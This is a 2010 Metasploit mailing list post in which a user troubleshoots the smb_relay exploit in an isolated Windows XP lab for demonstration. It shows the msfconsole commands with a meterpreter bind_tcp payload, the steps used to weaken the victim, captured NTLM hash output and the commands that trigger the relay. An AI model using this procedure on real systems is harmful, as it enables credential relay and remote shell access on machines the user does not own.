Metasploit mailing list archives
smb_relay returns "[-] Failed to authenticate"
From: Christian Schäfer <syrious3000 () hotmail de>
Date: Wed, 29 Dec 2010 20:18:03 +0100
Hello, I'm just trying to get the smb_relay exploit working on an isolated test-asset containing of 2 win xp sp3 machines with Metasploit Framework 3.5.1. for demonstration purpose. attacker: 192.168.69.7 victim: 192.168.69.3 To get the exploit working I uninstalled the Win Security Update KB957097 (from both machines) which prevents the exploit. After that I set LocalSecuritySettings / LocalPolicies / SecurityOptions / NetworkAccess: Sharing and Security model for local accounts to: "Classic" on the vicitim. Then I executed: gpupdate /force in windows shell On the attacking machine I set following network config:
tcp/ip / advanced/wins: disabled (to get port 139 free)
client for ms networks: enabled
file & printer sharing...: enabled
I made a change in the registry to get port 445 free) by setting: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] "SMBDeviceEnabled"=dword:00000000 I executed the exploit with the following commands and got a "Failed to authenticate" ...please help :( (SYRDSL = computer name , test = username and password) msf > use exploit/windows/smb/smb_relay msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(smb_relay) > set SRVHOST 192.168.69.7 SRVHOST => 192.168.69.7 msf exploit(smb_relay) > exploit [*] Exploit running as background job. [*] Started bind handler [*] Server started. [*] Received 192.168.69.3:1079 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1 [*] Sending Access Denied to 192.168.69.3:1079 \ [*] Received 192.168.69.3:1079 SYRDSL\test LMHASH:3e5a5ee7d3fd22d72fc039c755c14c9c33eb1778f2f939cc NTHASH:1934e7b2bfe1bd8979b505fdcfbc03cc44bd94334991444b OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1 [*] Authenticating to 192.168.69.3 as SYRDShttps://snt126.mail.live.com/default.aspx?rru=inbox&wa=wsignin1.0L\test... [*] Trying to AUTHENTICATE: username= test , domain= SYRDSL [-] Failed to authenticate as SYRDSL\test... On the victim machine I tried: typing in the explorer address line: \\192.168.69.7\fakeShare\fakeFile.jpg or in windows shell: net use \\192.168.69.7\ipc$ to trigger the exploit I would apreciate any hint...because I urgently need to get it working...please help :/ If i missed some important information please tell and I will provide it. Cheers Christian
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- smb_relay returns "[-] Failed to authenticate" Christian Schäfer (Dec 29)
- Re: smb_relay returns "[-] Failed to authenticate" Brian (Dec 29)
- Re: smb_relay returns "[-] Failed to authenticate" Christian Schäfer (Dec 30)